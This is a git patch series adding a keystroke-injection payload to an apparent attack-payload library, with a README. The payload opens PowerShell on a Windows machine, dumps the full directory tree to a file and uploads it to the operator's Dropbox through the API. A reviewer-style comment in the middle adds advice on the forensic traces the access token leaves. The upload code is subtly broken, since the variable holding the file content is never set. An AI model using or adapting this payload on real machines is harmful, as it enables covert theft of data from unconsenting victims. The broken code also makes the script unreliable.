From ba25f963ca0dad123e27397b34c38bb1df0c93fb Mon Sep 17 00:00:00 2001
From: Aleff
Date: Mon, 12 Jun 2023 14:43:29 +0200
Subject: [PATCH 1/4] Tree Structure Of The Operating System
---
.../payload.txt | 46 +++++++++++++++++++
1 file changed, 46 insertions(+)
create mode 100644 payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
new file mode 100644
index 0000000..88e06d1
--- /dev/null
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
@@ -0,0 +1,46 @@
+REM ###########################################################
+REM # |
+REM # Title : Tree Structure Of The Operating System |
+REM # Author : Aleff |
+REM # Version : 1.0 |
+REM # Category : Exfiltration |
+REM # Target : Windows 10-11 |
+REM # |
+REM ###########################################################
+
+
+REM Requirements:
+REM - Internet connection
+
+
+GUI r
+DELAY 1000
+STRING PowerShell
+ENTER
+DELAY 1000
+
+STRINGLN tree /f /a > out.txt
+
+REM It depends byt the content and by the path choosen
+DELAY 5000
+
+$filePath = ".\out.txt"
+
+REM Setting about exfiltration
+STRING $accessToken =
+STRING DROPBOX_ACCESS_TOKEN
+ENTER
+
+STRINGLN
+ $authHeader = @{Authorization = "Bearer $accessToken"}
+ $dropboxFilePath = "/out_exported.txt"
+
+ $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
+
+ $headers = @{}
+ $headers.Add("Authorization", "Bearer $accessToken")
+ $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
+ $headers.Add("Content-Type", "application/octet-stream")
+
+ Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent; exit;
+END_STRINGLN
From ad0fa4d3ad50e9327f843ce9a7ee53301b75c106 Mon Sep 17 00:00:00 2001
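Review bot: The Dropbox bearer token is typed into the interactive PowerShell window as plain text (`STRING $accessToken =` followed by `STRING DROPBOX_ACCESS_TOKEN`), so it can end up in the PSReadLine history file (depending on the installed PSReadLine version) and, where script block logging is enabled, in the PowerShell operational log. Anyone examining the host afterwards may recover a credential for the account that receives the upload, and those records, together with `out.txt` in the working directory and the request to `content.dropboxapi.com`, are what a responder would look at. The header's Requirements block does not mention this; I would add `REM - The token may remain in PowerShell history/logs on the host: use an app-scoped, short-lived token and revoke it after the test`. The same applies to `$accessToken="#DROPBOX_ACCESS_TOKEN"` in PATCH 4/4.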
From: aleff-github Date: Mon, 12 Jun 2023 14:44:12 +0200 Subject: [PATCH 2/4] readme --- .../1.png | Bin 0 -> 16141 bytes .../README.md | 32 ++++++++++++++++++ 2 files changed, 32 insertions(+) create mode 100644 payloads/library/exfiltration/Tree_structure_of_the_operating_system/1.png create mode 100644 payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md 
diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/1.png b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/1.png new file mode 100644 index 0000000000000000000000000000000000000000..a932623518a4ba0a0089beef463e168e14ce580a GIT binary patch literal 16141 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 out.txt` that permit to list the file name and not only the directories, using text characters instead of graphic characters to display rows linking subdirectories. Save all the output in the out.txt file and then send this file through Dropbox. + +## Dependencies + +* Firefox must be installed + +## Settings + +- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. + + `DEFINE DROPBOX_ACCESS_TOKEN "example"` + +- The path to check can be changed putting the full-path `tree /f /a > out.txt`. + + - `tree \ /f /a > out.txt` + - `tree C:\Users\Aleff\Documents /f /a > out.txt` + +- It depends byt the content and by the path choosen + + `DELAY 5000` \ No newline at end of file From d5ea63685022d62cd0b86f6b0b121ef4a5f4f4cc Mon Sep 17 00:00:00 2001 From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com> Date: Mon, 12 Jun 2023 13:54:07 -0400 Subject: [PATCH 3/4] Update payload.txt --- .../Tree_structure_of_the_operating_system/payload.txt | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt index 88e06d1..39fa8f0 100644 --- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt +++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt 
@@ -8,11 +8,9 @@ REM # Target : Windows 10-11 | REM # | REM ########################################################### - REM Requirements: REM - Internet connection - GUI r DELAY 1000 STRING PowerShell @@ -31,7 +29,7 @@ STRING $accessToken = STRING DROPBOX_ACCESS_TOKEN ENTER -STRINGLN +STRINGLN_BLOCK $authHeader = @{Authorization = "Bearer $accessToken"} $dropboxFilePath = "/out_exported.txt" From 23658aff0815673bf07062ac0a3a8c10ff3ac8b3 Mon Sep 17 00:00:00 2001 From: aleff-github Date: Mon, 12 Jun 2023 21:31:51 +0200 Subject: [PATCH 4/4] Update payload --- .../README.md | 10 +++------ .../payload.txt | 21 +++++++------------ 2 files changed, 10 insertions(+), 21 deletions(-) diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md index 738eeb5..3dca4d7 100644 --- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md +++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md @@ -18,15 +18,11 @@ Open a PowerShell and run the command `tree /f /a > out.txt` that permit to list ## Settings -- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. +- You must define your Dropbox accessToken or modify the exfiltration modality. - `DEFINE DROPBOX_ACCESS_TOKEN "example"` + `DEFINE #DROPBOX_ACCESS_TOKEN example` - The path to check can be changed putting the full-path `tree /f /a > out.txt`. - `tree \ /f /a > out.txt` - - `tree C:\Users\Aleff\Documents /f /a > out.txt` - -- It depends byt the content and by the path choosen - - `DELAY 5000` \ No newline at end of file + - `tree C:\Users\Aleff\Documents /f /a > out.txt` \ No newline at end of file 
